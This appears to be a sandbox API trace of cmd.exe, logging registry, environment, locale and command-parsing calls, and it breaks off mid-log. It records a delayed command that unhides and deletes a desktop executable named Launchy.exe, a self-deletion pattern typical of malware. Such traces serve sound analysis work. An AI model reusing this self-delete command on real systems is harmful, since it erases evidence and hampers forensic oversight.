lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2daf8c0 | out: phkResult=0x2daf8c0*=0x0) returned 0x2 [0248.032] VirtualQuery (in: lpAddress=0x2daf8cb, lpBuffer=0x2daf878, dwLength=0x1c | out: lpBuffer=0x2daf878*(BaseAddress=0x2daf000, AllocationBase=0x2cb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.032] VirtualQuery (in: lpAddress=0x2cb0000, lpBuffer=0x2daf878, dwLength=0x1c | out: lpBuffer=0x2daf878*(BaseAddress=0x2cb0000, AllocationBase=0x2cb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0248.032] VirtualQuery (in: lpAddress=0x2cb1000, lpBuffer=0x2daf878, dwLength=0x1c | out: lpBuffer=0x2daf878*(BaseAddress=0x2cb1000, AllocationBase=0x2cb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0248.032] VirtualQuery (in: lpAddress=0x2cb3000, lpBuffer=0x2daf878, dwLength=0x1c | out: lpBuffer=0x2daf878*(BaseAddress=0x2cb3000, AllocationBase=0x2cb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.032] VirtualQuery (in: lpAddress=0x2db0000, lpBuffer=0x2daf878, dwLength=0x1c | out: lpBuffer=0x2daf878*(BaseAddress=0x2db0000, AllocationBase=0x2db0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0248.032] GetConsoleOutputCP () returned 0x1b5 [0248.263] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0248.264] SetConsoleCtrlHandler (HandlerRoutine=0xab7260, Add=1) returned 1 [0248.264] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.264] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac388c | out: lpMode=0xac388c) returned 1 [0248.389] _get_osfhandle (_FileHandle=0) returned 0x8c [0248.389] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3888 | out: lpMode=0xac3888) returned 1 [0248.514] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.515] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0248.844] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.844] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0249.186] _get_osfhandle (_FileHandle=1) returned 0x90 [0249.186] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0249.387] _get_osfhandle (_FileHandle=0) returned 0x8c [0249.387] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0249.496] _get_osfhandle (_FileHandle=0) returned 0x8c [0249.496] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0249.623] GetEnvironmentStringsW () returned 0x3379b28* [0249.623] GetProcessHeap () returned 0x3360000 [0249.623] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb12) returned 0x337a648 [0249.624] FreeEnvironmentStringsA (penv="A") returned 1 [0249.624] GetProcessHeap () returned 0x3360000 [0249.624] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x4) returned 0x3374fb8 [0249.624] GetEnvironmentStringsW () returned 0x3379b28* [0249.624] GetProcessHeap () returned 0x3360000 [0249.624] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb12) returned 0x337b168 [0249.624] FreeEnvironmentStringsA (penv="A") returned 1 [0249.624] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2dae81c | out: phkResult=0x2dae81c*=0x240) returned 0x0 [0249.624] RegQueryValueExW (in: hKey=0x240, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0xb0, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.624] RegQueryValueExW (in: hKey=0x240, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x1, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.624] RegQueryValueExW (in: hKey=0x240, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0x1, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.624] RegQueryValueExW (in: hKey=0x240, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x0, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x40, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x40, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0x40, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.625] RegCloseKey (hKey=0x240) returned 0x0 [0249.625] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2dae81c | out: phkResult=0x2dae81c*=0x240) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0x40, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x1, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0x1, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x0, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x9, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x4, lpData=0x2dae828*=0x9, lpcbData=0x2dae820*=0x4) returned 0x0 [0249.625] RegQueryValueExW (in: hKey=0x240, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2dae824, lpData=0x2dae828, lpcbData=0x2dae820*=0x1000 | out: lpType=0x2dae824*=0x0, lpData=0x2dae828*=0x9, lpcbData=0x2dae820*=0x1000) returned 0x2 [0249.625] RegCloseKey (hKey=0x240) returned 0x0 [0249.626] time (in: timer=0x0 | out: timer=0x0) returned 0x5ed59c31 [0249.626] srand (_Seed=0x5ed59c31) [0249.626] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"" [0249.626] malloc (_Size=0x4000) returned 0x3262570 [0249.627] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"" [0249.627] malloc (_Size=0xffce) returned 0x4c00048 [0249.628] ??_V@YAXPAX@Z () returned 0x2daf800 [0249.628] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4c00048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.629] malloc (_Size=0xffce) returned 0x4c10020 [0249.629] ??_V@YAXPAX@Z () returned 0x2daf5d4 [0249.630] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c10020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0249.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0249.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.630] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0249.631] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0249.631] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0249.631] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0249.631] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0249.631] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0249.631] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0249.631] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0249.631] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0249.631] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0249.632] GetProcessHeap () returned 0x3360000 [0249.632] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337a648) returned 1 [0249.632] GetEnvironmentStringsW () returned 0x3379b28* [0249.632] GetProcessHeap () returned 0x3360000 [0249.632] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb2a) returned 0x337c7c0 [0249.632] FreeEnvironmentStringsA (penv="A") returned 1 [0249.632] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0249.632] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0249.632] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0249.632] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0249.632] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0249.632] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0249.632] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0249.632] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0249.632] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0249.633] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0249.633] malloc (_Size=0xffce) returned 0x4c1fff8 [0249.633] ??_V@YAXPAX@Z () returned 0x2daf36c [0249.634] GetProcessHeap () returned 0x3360000 [0249.634] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x38) returned 0x3377350 [0249.634] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4c1fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.634] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x4c1fff8, lpFilePart=0x2daf3b8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2daf3b8*="Desktop") returned 0x17 [0249.635] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.635] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2daf138 | out: lpFindFileData=0x2daf138*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x33773d0 [0249.635] FindClose (in: hFindFile=0x33773d0 | out: hFindFile=0x33773d0) returned 1 [0249.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x2daf138 | out: lpFindFileData=0x2daf138*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x17e9454d, ftLastAccessTime.dwHighDateTime=0x1d63874, ftLastWriteTime.dwLowDateTime=0x17e9454d, ftLastWriteTime.dwHighDateTime=0x1d63874, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3377150 [0249.635] FindClose (in: hFindFile=0x3377150 | out: hFindFile=0x3377150) returned 1 [0249.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x2daf138 | out: lpFindFileData=0x2daf138*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x108af93a, ftLastAccessTime.dwHighDateTime=0x1d63874, ftLastWriteTime.dwLowDateTime=0x108af93a, ftLastWriteTime.dwHighDateTime=0x1d63874, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x33773d0 [0249.635] FindClose (in: hFindFile=0x33773d0 | out: hFindFile=0x33773d0) returned 1 [0249.636] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.636] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0249.636] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0249.636] GetProcessHeap () returned 0x3360000 [0249.636] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337c7c0) returned 1 [0249.636] GetEnvironmentStringsW () returned 0x3379b28* [0249.636] GetProcessHeap () returned 0x3360000 [0249.636] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb62) returned 0x337bc88 [0249.636] FreeEnvironmentStringsA (penv="=") returned 1 [0249.636] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4c00048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.636] GetProcessHeap () returned 0x3360000 [0249.636] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3377350) returned 1 [0249.636] ??_V@YAXPAX@Z () returned 0x1 [0249.636] ??_V@YAXPAX@Z () returned 0x1 [0249.636] GetProcessHeap () returned 0x3360000 [0249.636] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x400e) returned 0x337de68 [0249.638] GetProcessHeap () returned 0x3360000 [0249.638] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xec) returned 0x337c7f8 [0249.638] GetProcessHeap () returned 0x3360000 [0249.638] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337de68) returned 1 [0249.638] GetConsoleOutputCP () returned 0x1b5 [0250.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0250.043] GetUserDefaultLCID () returned 0x409 [0250.043] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xabf82c, cchData=8 | out: lpLCData=":") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2daf728, cchData=128 | out: lpLCData="0") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2daf728, cchData=128 | out: lpLCData="0") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2daf728, cchData=128 | out: lpLCData="1") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xabf81c, cchData=8 | out: lpLCData="/") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xabf7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xabf778, cchData=32 | out: lpLCData="Tue") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xabf738, cchData=32 | out: lpLCData="Wed") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xabf6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xabf6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xabf678, cchData=32 | out: lpLCData="Sat") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xabf638, cchData=32 | out: lpLCData="Sun") returned 4 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xabf80c, cchData=8 | out: lpLCData=".") returned 2 [0250.044] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xabf7f8, cchData=8 | out: lpLCData=",") returned 2 [0250.044] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0250.047] GetProcessHeap () returned 0x3360000 [0250.047] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x0, Size=0x20c) returned 0x337c8f0 [0250.047] GetConsoleTitleW (in: lpConsoleTitle=0x337c8f0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0250.216] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0250.216] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0250.216] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0250.216] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0250.216] ??_V@YAXPAX@Z () returned 0x1 [0250.218] GetProcessHeap () returned 0x3360000 [0250.218] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x400a) returned 0x337de68 [0250.218] GetProcessHeap () returned 0x3360000 [0250.218] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337de68) returned 1 [0250.219] _wcsicmp (_String1="choice", _String2=")") returned 58 [0250.219] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0250.219] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0250.219] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0250.219] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0250.219] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0250.219] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0250.219] GetProcessHeap () returned 0x3360000 [0250.219] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x3372900 [0250.219] GetProcessHeap () returned 0x3360000 [0250.219] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x16) returned 0x33754e0 [0250.219] GetProcessHeap () returned 0x3360000 [0250.219] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x22) returned 0x33741e8 [0250.220] GetProcessHeap () returned 0x3360000 [0250.220] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x33726c0 [0250.221] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0250.221] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0250.221] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0250.221] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0250.221] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0250.221] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0250.221] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0250.221] GetProcessHeap () returned 0x3360000 [0250.221] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x3372780 [0250.221] GetProcessHeap () returned 0x3360000 [0250.221] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x16) returned 0x33753a0 [0250.222] GetProcessHeap () returned 0x3360000 [0250.222] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x5e) returned 0x337cb08 [0250.223] GetProcessHeap () returned 0x3360000 [0250.223] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x33722a0 [0250.224] _wcsicmp (_String1="del", _String2=")") returned 59 [0250.224] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0250.224] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0250.224] _wcsicmp (_String1="IF", _String2="del") returned 5 [0250.224] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0250.224] _wcsicmp (_String1="REM", _String2="del") returned 14 [0250.224] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0250.224] GetProcessHeap () returned 0x3360000 [0250.224] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x3372840 [0250.224] GetProcessHeap () returned 0x3360000 [0250.224] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x10) returned 0x3370dc0 [0250.225] GetProcessHeap () returned 0x3360000 [0250.225] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x56) returned 0x33727e0 [0250.226] GetConsoleTitleW (in: lpConsoleTitle=0x2daf5c0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0250.358] malloc (_Size=0xffce) returned 0x4c12d58 [0250.359] ??_V@YAXPAX@Z () returned 0x2daf34c [0250.360] malloc (_Size=0xffce) returned 0x4c22d30 [0250.361] ??_V@YAXPAX@Z () returned 0x2daf104 [0250.361] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0250.362] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0250.362] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0250.362] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0250.362] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0250.362] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0250.362] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0250.362] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0250.362] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0250.362] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0250.362] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0250.362] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0250.362] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0250.362] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0250.362] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0250.362] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0250.362] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0250.362] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0250.362] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0250.362] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0250.362] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0250.362] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0250.362] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0250.362] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0250.362] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0250.362] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0250.362] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0250.362] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0250.363] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0250.363] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0250.363] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0250.363] _wcsicmp (_String1="choice", _String2="START") returned -16 [0250.363] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0250.363] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0250.363] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0250.363] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0250.363] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0250.363] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0250.363] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0250.363] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0250.363] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0250.363] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0250.363] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0250.363] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0250.363] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0250.363] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0250.363] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0250.363] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0250.363] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0250.363] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0250.363] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0250.363] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0250.363] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0250.363] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0250.363] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0250.364] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0250.364] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0250.364] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0250.364] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0250.364] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0250.364] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0250.364] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0250.364] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0250.364] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0250.364] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0250.364] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0250.364] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0250.364] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0250.364] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0250.364] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0250.364] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0250.364] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0250.364] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0250.364] _wcsicmp (_String1="choice", _String2="START") returned -16 [0250.364] 